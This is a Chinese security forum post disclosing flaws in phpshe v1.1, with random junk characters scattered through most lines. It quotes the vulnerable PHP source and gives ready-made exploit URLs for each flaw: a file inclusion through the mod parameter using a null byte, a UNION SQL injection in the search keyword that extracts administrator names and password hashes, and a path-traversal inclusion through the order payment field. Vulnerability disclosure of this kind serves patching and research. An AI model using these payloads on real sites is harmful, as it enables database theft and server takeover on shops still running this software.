找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 3156|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
  u# d8 f$ W9 f% R. \% ^' W! ^% {/* Phpshe v1.1 Vulnerability
$ x* [: o* z, e0 l( F/ @- C/* ========================
- t! D* C/ d& N7 n' d$ V# X# s& o/* By: : Kn1f3
' J, }' H% @2 m- Q1 _/ C/ w2 |/* E-Mail : 681796@qq.com
: K: ~3 Q2 G& R2 \/*******************************************************/4 a2 d+ \; b7 V  b: e0 E
0×00 整体大概参数传输
4 U. N# c0 M) G3 k' n) g
5 J0 J7 ?+ `6 @2 a# B3 z0 c0 ?8 }. c9 a  v9 r$ O

9 N; d3 ~% t7 o0 T( E6 J; s" F1 ]//common.php
3 \. D/ Z1 I: r* g9 @if (get_magic_quotes_gpc()) {  @2 @, F% d# F/ s. `, n
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');9 ~6 C& V4 y0 c' c  Z, w1 Y7 _
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');( P8 g' e. L3 n, T
}
: ?7 d7 Z& A; _# \/ f# Q) Xelse {3 j) C! F7 I  Q* K3 }9 T+ M
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');7 R0 r  C! w' y8 P8 l+ F/ f# @
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# C- k: A* [6 Y0 Z5 M( l; i* S9 S& X
}
2 d7 [# S$ t: \session_start();& e: I# x3 g% i& K  w' u
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');" {5 Z7 J4 a( i: k" A$ }. t& [
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');4 `, P# G' C% G- I: w5 b

0 W5 X+ B+ E) p# A$ ^+ W0×01 包含漏洞
- m, R0 |* H- j) k / I5 R9 E0 W$ J) g: G  q% v* x

/ ], e- P) s$ V' w//首页文件3 Z2 g" H0 L$ A$ N! e9 B' f+ ^
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);3 {/ O$ i: y5 c; a
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
% X3 p9 E0 \0 \" Zpe_result();& Y$ A) ^; Z% I& M
?># P, |& k! K& v  F4 ~
//common 文件 第15行开始
* m2 ?& D  t' @+ [- R; Y3 Iurl路由配置8 F( }4 g+ B: u5 n
$module = $mod = $act = 'index';: N+ g  ]+ H; S$ U6 ^7 o
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
+ m1 j# [; Y+ X4 A% N7 p0 O$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);  Q. C+ J- b$ {) m! \7 C% l; b
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
' A3 ?$ V. _6 C+ l9 W5 D1 l; l//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00* C2 p# K2 S' J# P


$ n2 i% y' M2 Q. y. d/ a, a 4 s( @, M& @# T; I/ ^
0×02 搜索注入
$ p. Y2 `( z+ w" e 2 Q8 y8 y/ }/ O  o2 w$ I* g, A
<code id="code2">

//product.php文件& a  i! Y8 A6 A; G! X. R
case 'list':8 e0 |! O7 q. C7 a0 c2 a& g
$category_id = intval($id);
6 w# R4 A6 Q- ^, Y$info = $db->pe_select('category', array('category_id'=>$category_id));: S( j) D# ?( v! f; @! B* u
//搜索
+ @, A, |3 i( S7 ~& \- r, q0 ~' d$sqlwhere = " and `product_state` = 1";- @$ D. }4 @5 E! r5 T( S/ Z5 ^
pe_lead('hook/category.hook.php');
: v8 W# `  I4 Q" E* Yif ($category_id) {) ?% }4 F# o+ y+ Q
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
6 L$ k& p  F6 L1 ]2 Y$ Z( `}
+ J& J! Y- @& C& s& \" T$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
/ c+ O" _  V% ]8 W9 m; lif ($_g_orderby) {
4 `1 h) V; K3 Y) B! l$orderby = explode('_', $_g_orderby);# e- R+ m& X/ W' d/ W9 c
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
# f7 U7 S+ u1 k}
" m2 `( X6 v+ ^7 U" i5 telse {
: T# t/ @2 S- c0 j% O6 o1 k$sqlwhere .= " order by `product_id` desc";$ t8 O0 m  B& s* x$ R' ]
}0 l; X. {/ C) i  c1 C: U) |) x
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
% u; g6 B  f7 {$ [4 E# i//热卖排行( ]; t  T. E% e* s. {
$product_hotlist = product_hotlist();
  s* D- B0 c" q7 o0 k' j7 V//当前路径
& t' }- D/ n( |8 u: A$nowpath = category_path($category_id);# W5 x/ Q0 o3 a
$seo = pe_seo($info['category_name']);& l: T! D6 B, L- r! [4 A
include(pe_tpl('product_list.html'));
1 y) Q* ~  t5 F! D//跟进selectall函数库: A) n7 l8 d( |3 l" @1 r) a' r" G: a
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array()). F9 n& q& J: d  v7 e6 Z
{
. n  w" d+ M8 I& K+ z//处理条件语句- Y) s" r  d1 i* p
$sqlwhere = $this->_dowhere($where);2 I, {" V  i: l7 e/ m
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);8 C$ Z& z$ d& Z" g1 v
}
7 H* U) r+ h% ~' \5 p* Q( U//exp" Y7 K! C5 O7 n2 o( }' @
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1  w% k* h% A& e; R. J/ @

</code>/ @7 l8 ~# |6 Q

- B" M6 ^- z! b5 d' ^0×03 包含漏洞2" y9 A5 k* w5 j3 M& O$ G- w

0 h; }3 P+ J% b  L0 K& \  T<code id="code3">

//order.php

case 'pay':

1 P4 Q( R; |( X4 ?6 ~
$order_id = pe_dbhold($_g_id);


' s5 D5 i7 F- U8 ~3 m- i& k$cache_payway = cache::get('payway');


' e' ^% e2 l* C% Zforeach($cache_payway as $k => $v) {

/ I6 k: L$ e9 N9 u1 t6 ^! c1 I( [
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


8 V& ^8 {6 o  A, z7 N, N4 uif ($k == 'bank') {


' L% @7 G/ x: v. H3 |6 \' Y$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


, M0 T5 Z9 O6 ~$ N2 L; Q( |, d}

% s4 ?8 ?/ V8 [9 y4 B
}


( l* f5 E, C6 e9 v0 |* [4 J$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

  M# ~9 j% M% a
!$order['order_id'] && pe_error('订单号错误...');


- g" q/ c1 U  |; D! Vif (isset($_p_pesubmit)) {

4 Y7 `. B1 n; r
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


* c# p4 y' n% j. f. n$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


- y# M$ M" G# N# l+ Rforeach ($info_list as $v) {


3 b* q7 F# L, H5 Z5 u$order['order_name'] .= "{$v['product_name']};";: v' [# C# P- `  ~0 k4 w' X1 s

5 |2 W8 M5 `7 I- l. {, e) M
}


+ g/ V8 j  E! [# T3 mecho '正在为您连接支付网站,请稍后...';


' `. @6 y; f. Q( cinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

  j" y$ g$ _* f0 T  D
}//当一切准备好的时候就可以进行"鸡肋包含了"


- t/ X: e: y1 d/ Selse {


4 \3 B- m8 x4 P4 Bpe_error('支付错误...');


7 p& |" L& C# N2 e3 a}

& e1 j  F9 B# w
}

' A  V; B5 @. x1 v6 V
$seo = pe_seo('选择支付方式');


6 j+ B6 i+ |3 j# Dinclude(pe_tpl('order_pay.html'));


1 J) T  V& t7 E  u# S% G5 E& Lbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>1 q9 ?6 R' ]1 J( m+ r

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表